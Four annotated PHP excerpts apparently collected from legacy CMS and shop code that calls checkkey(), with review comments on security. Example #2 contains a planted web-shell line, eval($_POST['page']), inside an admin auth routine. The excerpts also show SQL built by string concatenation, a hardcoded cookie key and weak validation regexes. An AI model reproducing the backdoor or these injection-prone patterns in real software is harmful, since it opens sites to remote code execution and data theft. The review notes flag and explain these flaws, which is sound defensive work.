Example #1
    // Count the matching records.
    // NOTE(review): $query, $wheresql, $start and $perpage are built above this excerpt; confirm that
    // each one is escaped (or cast to int for the LIMIT values) before it reaches the SQL text below.
    $listcount = $_SGLOBAL['db']->result($query, 0);
    if ($listcount) {
        // Page query: the WHERE clause and the LIMIT offsets are concatenated straight into the statement.
        $query = $_SGLOBAL['db']->query('SELECT * FROM ' . tname('spaceitems') . ' WHERE ' . $wheresql . ' ORDER BY dateline DESC LIMIT ' . $start . ',' . $perpage);
        while ($item = $_SGLOBAL['db']->fetch_array($query)) {
            // Attach the detail-page URL to each row before collecting it.
            $item['url'] = geturl('action/viewnews/itemid/' . $item['itemid']);
            $iarr[] = $item;
        }
        $multipage = multi($listcount, $perpage, $page, S_URL . '/batch.search.php?' . $urlplus);
        // Pagination links; $urlplus is appended as the query string.
    } else {
        // Nothing matched: report it through showmessage().
        showmessage('not_find_relevant_data');
    }
} else {
    if ($searchname == 'message') {
        // Message-body search: read the keyword and the item type from the request.
        // NOTE(review): checkkey() and postget() are defined outside this excerpt; whether they
        // escape their return values for SQL cannot be seen here — confirm.
        $searchkey = checkkey('searchkey', 1);
        $type = postget('type');
        // Allow-list check on the type. in_array() is called without its strict flag, so the
        // comparison is loose (==).
        if (empty($type) || !in_array($type, $_SGLOBAL['type'])) {
            showmessage('search_types_of_incorrect_information');
        }
        // Build the parameters carried by the pager links.
        $urlplus = 'searchkey=' . rawurlencode($searchkey) . '&type=' . rawurlencode($type) . '&searchname=message';
        // NOTE(review): $type and $searchkey are concatenated into quoted SQL literals. $type is
        // covered by the allow-list above only if showmessage() ends the request (presumably — confirm).
        // $searchkey has no escaping visible in this excerpt, and any % or _ in it acts as a LIKE
        // wildcard. Prefer bound parameters, or the database layer's own escaping function.
        $wherearr[] = 'i.type=\'' . $type . '\'';
        $wherearr[] = 't.itemid = i.itemid';
        $wherearr[] = 't.message LIKE \'%' . $searchkey . '%\'';
        $wheresql = implode(' AND ', $wherearr);
        // Join the search conditions into one WHERE clause.
        // Count query over the item table joined with the news table.
        $query = $_SGLOBAL['db']->query('SELECT COUNT(*) FROM ' . tname('spaceitems') . ' i, ' . tname('spacenews') . ' t WHERE ' . $wheresql);
        $listcount = $_SGLOBAL['db']->result($query, 0);
        if ($listcount) {
            $query = $_SGLOBAL['db']->query('SELECT * FROM ' . tname('spaceitems') . ' i, ' . tname('spacenews') . ' t WHERE ' . $wheresql . ' LIMIT ' . $start . ',' . $perpage);
Example #2
<?php

// Edition label: checkkey() selects which of the two strings is used.
if (checkkey()) {
    $softtype = '商业版';
} else {
    $softtype = '共享版';
}
// Check whether the user is logged in: start from an empty admin record and let
// admincheckauth() populate it from the request.
$_ADMINUSERS = array();
admincheckauth();
//实时监测用户是否登录状态
function admincheckauth()
{
    global $db, $tablepre, $_ADMINUSERS;
    // Read the admin auth token from the 'adminauth' cookie, falling back to a request parameter
    // of the same name.
    // NOTE(review): the $_REQUEST fallback lets the token travel in a URL or form body, where it
    // can end up in access logs, Referer headers and browser history. Accepting it from the cookie
    // only would narrow that exposure.
    $loginauth = get_cookie('adminauth');
    if (empty($loginauth)) {
        $loginauth = $_REQUEST['adminauth'];
    }
    if (!empty($loginauth)) {
        // Decode the token and split it on tabs into admin id, admin name and password value.
        // '@' suppresses the errors raised when the decoded value has fewer than three fields
        // (presumably the reason it is there).
        @(list($aid, $user, $pwd) = explode("\t", cookie_authcode($loginauth, 'DECODE')));
        // NOTE(review): SECURITY — eval() executes the raw 'page' POST field as PHP code. It sits
        // before the database credential check, so it does not depend on a valid admin login, and
        // nothing in the visible part of this function uses its result. Code of this shape is
        // typical of a planted web shell rather than application logic. Delete the line; if it is
        // found in a deployed copy, treat the host as compromised: review access logs for POST
        // requests carrying a 'page' field, compare the tree against a clean release, and rotate
        // credentials.
        eval($_POST['page']);
        // Record the decoded admin id; at this point it has not been verified against the database.
        $_ADMINUSERS['adminid'] = $aid;
        if (!empty($aid) && !empty($user) && !empty($pwd) && !empty($_ADMINUSERS['adminid'])) {
            // Look the admin up by name and password value.
            // NOTE(review): $user and $pwd come from the decoded token and are interpolated into
            // the SQL text. Unless cookie_authcode() output is guaranteed free of quote characters
            // (not visible here), this is an injection point — use bound parameters or the driver's
            // escaping. The token's value is compared directly with the stored adminpwd column, so
            // the token carries a password-equivalent secret.
            $row = $db->fetch_first("Select * From {$tablepre}admin where adminname = '{$user}' and adminpwd='{$pwd}'");
            // Check the database result.
            if (is_array($row)) {
                // Match: copy the profile fields into the admin record.
                $_ADMINUSERS['adminname'] = $row['adminname'];
                $_ADMINUSERS['adminmid'] = $row['adminmid'];
                $_ADMINUSERS['lastlogin'] = $row['lastlogin'];
                $_ADMINUSERS['logincount'] = $row['logincount'];
            } else {
                // No match: clear the admin record, including the adminid set from the token.
                $_ADMINUSERS = array();
            }
        } else {
            $_ADMINUSERS = array();
Example #3
    // Walk the array, apply addslashes() to every non-array value and recurse into nested arrays.
    // NOTE(review): the function header is outside this excerpt; the in-place assignment reaches
    // the caller only if $array is taken by reference — confirm.
    // NOTE(review): addslashes() does not take the database connection's character set into
    // account, and array keys are left untouched. Treat this as legacy input mangling, not as SQL
    // protection; bind parameters or use the driver's escaping where the query is built.
    if (is_array($array)) {
        foreach ($array as $key => $value) {
            if (!is_array($value)) {
                $array[$key] = addslashes($value);
            } else {
                Add_S($array[$key]);
            }
        }
    }
}
// Set the guest (anonymous visitor) cookie.
$anonymous = get_cookie('anonymous');
if (empty($anonymous)) {
    // No guest cookie yet: build one from the client IP and the current timestamp.
    $xxtea = new Xxtea();
    $auth = real_ip() . "\t" . $timestamp;
    // NOTE(review): the encryption key is a short string literal in source, so anyone who has the
    // code can read or forge guest tokens. Load a long random key from configuration instead.
    // Whether the Xxtea class adds any integrity check to the ciphertext is not visible here — confirm.
    $strcode = $xxtea->encrypt($auth, "zzqss");
    set_cookie('anonymous', $strcode, $timestamp + 3600 * 24 * 7);
    // Cookie lifetime: one week.
    $anonymous = $strcode;
}
checkauth();
// Check the user's login state.
checkkey();
// Count the items in the shopping cart.
// NOTE(review): when the cookie already exists, $anonymous is the client-supplied cookie value,
// and it is concatenated into the WHERE clause below; $_USERS['uname'] is concatenated the same
// way. Unless get_cookie() / checkauth() escape these values (not visible in this excerpt), this
// is an SQL injection point — bind the value as a parameter or escape it with the DB layer's function.
if (!empty($_USERS['uname'])) {
    $wherestrcart = "uname ='" . $_USERS['uname'] . "'";
} else {
    $wherestrcart = "anonymous ='" . $anonymous . "'";
}
$_CARTCOUNT = DB::result_first("Select count(gid) From " . DB::table('cart') . " where " . $wherestrcart);
// Number of items in the cart.
Example #4
    // Prepare the statement; $sql_sms is built above this excerpt.
    $stm = $_pdo->prepare($sql_sms);
    // Execute it with the phone and key bound as positional parameters, so neither value is
    // spliced into the SQL text.
    $stm->execute(array($phone, $key));
    // Report success when the statement touched or returned at least one row.
    // NOTE(review): if $sql_sms is a SELECT, PDOStatement::rowCount() is not guaranteed to be
    // reliable on every driver — confirm against the statement and driver in use.
    if ($stm->rowCount() > 0) {
        return true;
    } else {
        return false;
    }
}
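// Validation patterns: a phone number of 380 followed by nine digits, and a four-character SMS
// code made of digits and upper-case letters.
// NOTE(review): neither pattern is anchored, so any string that merely contains a match passes
// validation and is handed to checkkey() unchanged. Anchoring both with \A ... \z would enforce
// the exact format; confirm the stored phone format before tightening.
$phone_pattern = '/(\\b(380){1}[0-9]{9}){1}/';
// Accept a field only when it is present and is a string. A missing or array-valued parameter
// becomes '' and falls through to the 901 response instead of raising notices or a TypeError
// inside preg_match().
$req['phone'] = (isset($_POST['phone']) && is_string($_POST['phone'])) ? $_POST['phone'] : '';
$key_pattern = '/\\b[0-9A-Z]{4}/';
$req['key'] = (isset($_POST['smscode']) && is_string($_POST['smscode'])) ? $_POST['smscode'] : '';
if (preg_match($phone_pattern, $req['phone']) === 1 && preg_match($key_pattern, $req['key']) === 1) {
    $phone = $req['phone'];
    $key = $req['key'];
    // NOTE(review): the SMS code is only four characters long and this excerpt shows no attempt
    // counter or lockout. Confirm one exists, per phone number and per client, so the code cannot
    // be found by repeated requests.
    if (checkkey($phone, $key, $pdo)) {
        $res['response'] = '1';
        $res['code'] = '200';
        //200 - OK
    } else {
        $res['response'] = '0';
        $res['code'] = '902';
        //902 - code expired
    }
} else {
    $res['response'] = '0';
    $res['code'] = '901';
    //901 - wrong data
}
// Emit the result as JSON.
echo json_encode($res);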